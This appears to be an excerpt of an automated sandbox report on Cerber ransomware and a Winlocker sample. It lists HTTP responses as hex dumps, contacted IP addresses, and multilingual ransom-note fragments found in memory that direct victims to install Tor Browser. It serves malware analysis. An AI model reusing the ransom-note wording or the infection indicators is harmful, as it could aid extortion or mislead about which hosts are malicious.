        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:09 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=114X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:10 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:11 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:12 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=110X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:51:13 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=106X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 8.248.141.254
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 8.248.141.254
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 8.248.141.254
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 8.248.141.254
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 178.79.242.0
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">s</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">6Incle</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor&nbsp;Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor&nbsp;Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor&nbsp;Browser.</p> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
        Source: Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: ?Hhttp://www.google.comhttp://www.yahoo.comhttp://www.example.comtin9999.tmp0.0.0.0.%d equals www.yahoo.com (Yahoo)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hrend der Installation von Tor&nbsp;Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
        Source: Endermanch@WinlockerVB6Blacksod.exe, 00000039.00000000.415216580.00000000009CE000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.google.comhttp://www.yahoo.comhttp://www.example.comtin9999.tmp0.0.0.0.%d equals www.yahoo.com (Yahoo)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
